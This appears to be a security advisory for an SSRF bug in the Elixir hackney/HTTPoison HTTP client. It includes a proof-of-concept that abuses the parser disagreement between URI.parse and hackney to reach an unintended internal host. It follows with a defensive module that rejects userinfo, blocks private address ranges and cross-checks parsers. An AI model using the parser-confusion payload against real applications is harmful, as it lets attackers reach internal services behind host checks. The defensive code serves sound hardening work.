Technical Details: It's possible to conduct SSRF attacks because of the way URLs are parsed by the built-in URI module and by hackney. Given the URL http://[email protected]/, URI.parse/1 reports the host as 127.0.0.1 (which is correct), while hackney sees the host as 127.2.2.2/. This can be abused to conduct SSRF attacks where an application relies on URI.parse/1 for host checking and then hands the same, unmodified string to hackney (directly, or indirectly through HTTPoison, which is built on hackney). See the PoC below.
defmodule MyApp do
  # Parse the attack string with URI, print what URI sees, then hand the same
  # string to hackney and observe where the request actually goes.
  def parse_and_print_url() do
    attack_string = "http://[email protected]/"
    uri = URI.parse(attack_string)
    IO.puts("Host: #{uri.host}")
    IO.puts("Port: #{uri.port}")

    # :httpc sends the request to the host URI reported, 127.0.0.1
    # (needs :inets.start() first and a charlist URL):
    # {:ok, {{_, 200, _}, _, body}} =
    #   :httpc.request(:get, {String.to_charlist(attack_string), []}, [], body_format: :binary)
    # IO.puts("Response body: #{body}")

    # HTTPoison sends the request to 127.2.2.2:
    # HTTPoison.start()
    # HTTPoison.get!(attack_string)

    # hackney, which HTTPoison uses, sends the request to 127.2.2.2
    :hackney.get(attack_string, [], "", async: :once)
  end
end
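As an added example (not code from the advisory or from the hackney project), the following module shows one way to close the gap the PoC exploits: parse once with URI, reject any URL that carries userinfo at all, refuse loopback and private addresses, rebuild a canonical URL from the parsed fields so the attacker's raw bytes never reach hackney, and finally ask hackney's own parser (:hackney_url.parse_url/1) which host it sees and refuse on any disagreement. The module name SafeFetch, the blocked address ranges, and the constructed input URLs in the usage note are assumptions; the record extraction assumes the hackney dependency is present.

```elixir
defmodule SafeFetch do
  # Added example, not from the advisory or the hackney project.
  # Idea: never validate the raw string with one parser and then hand the same
  # raw string to another. Parse once, reject anything suspicious, rebuild a
  # canonical URL from the parsed fields, and cross-check hackney's view of it.
  require Record

  # Pull in hackney's #hackney_url{} record so we can read the host hackney
  # will actually connect to (assumes the hackney dependency is available).
  Record.defrecord(
    :hackney_url,
    Record.extract(:hackney_url, from_lib: "hackney/include/hackney_lib.hrl")
  )

  @allowed_schemes ["http", "https"]

  @doc "Fetch `raw_url` with hackney, or return `{:error, reason}` if it is unsafe."
  def safe_get(raw_url) when is_binary(raw_url) do
    with {:ok, uri} <- parse(raw_url),
         :ok <- check_host(uri.host),
         canonical = canonicalize(uri),
         :ok <- cross_check(canonical, uri.host) do
      # Only the rebuilt URL reaches hackney; the attacker's bytes never do.
      :hackney.get(canonical, [], "", [])
    end
  end

  # Parse with URI and reject the shapes that enable parser confusion.
  defp parse(raw) do
    uri = URI.parse(raw)

    cond do
      uri.scheme not in @allowed_schemes -> {:error, :scheme_not_allowed}
      uri.host in [nil, ""] -> {:error, :missing_host}
      # userinfo ("user:pass@") is the hook for this whole class of bugs;
      # outbound fetches of user-supplied URLs have no need for it.
      uri.userinfo != nil -> {:error, :userinfo_not_allowed}
      true -> {:ok, uri}
    end
  end

  # Rebuild the URL from the parsed components only (no userinfo, no fragment).
  defp canonicalize(%URI{} = uri) do
    URI.to_string(%URI{
      scheme: uri.scheme,
      host: uri.host,
      port: uri.port,
      path: uri.path || "/",
      query: uri.query
    })
  end

  # Literal IPs are checked directly; names are resolved and every answer checked.
  # Caveat: this lookup and the one hackney does later are separate, so DNS
  # rebinding is not covered by this check alone.
  defp check_host(host) do
    chars = String.to_charlist(host)

    addrs =
      case :inet.parse_address(chars) do
        {:ok, ip} ->
          [ip]

        {:error, :einval} ->
          case :inet.getaddrs(chars, :inet) do
            {:ok, ips} -> ips
            {:error, _} -> []
          end
      end

    cond do
      addrs == [] -> {:error, :unresolvable_host}
      Enum.any?(addrs, &internal?/1) -> {:error, :internal_address}
      true -> :ok
    end
  end

  # Loopback, RFC 1918, link-local, "this host" and their IPv6 equivalents
  # (assumed block list; extend for your own environment).
  defp internal?({127, _, _, _}), do: true
  defp internal?({10, _, _, _}), do: true
  defp internal?({172, b, _, _}) when b in 16..31, do: true
  defp internal?({192, 168, _, _}), do: true
  defp internal?({169, 254, _, _}), do: true
  defp internal?({0, _, _, _}), do: true
  defp internal?({0, 0, 0, 0, 0, 0, 0, 1}), do: true
  # IPv4-mapped IPv6 (::ffff:a.b.c.d): unwrap and re-check as IPv4.
  defp internal?({0, 0, 0, 0, 0, 0xFFFF, hi, lo}),
    do: internal?({div(hi, 256), rem(hi, 256), div(lo, 256), rem(lo, 256)})

  defp internal?(_), do: false

  # Ask hackney's own parser which host it sees; refuse on any disagreement.
  defp cross_check(canonical, expected_host) do
    seen = canonical |> :hackney_url.parse_url() |> hackney_url(:host) |> to_string()
    if seen == expected_host, do: :ok, else: {:error, {:parser_mismatch, seen}}
  end
end
```

Constructed inputs to try: SafeFetch.safe_get("http://attacker.example:80@127.0.0.1/") is rejected at the userinfo check before any parser disagreement can matter, SafeFetch.safe_get("http://127.0.0.1/") and SafeFetch.safe_get("http://[::1]/") are rejected as internal addresses, and a public hostname is passed to hackney only in its rebuilt, canonical form. Dropping userinfo outright is the simplest hardening here; the cross-check against :hackney_url.parse_url/1 is the belt-and-braces step that also catches any other disagreement between the two parsers.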
More information regarding this vulnerability and the parser behaviour can be seen here: https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf, https://www.youtube.com/watch?v=28xWcRegncw&pp=ygULb3JhbmdlIHRzYWk%3D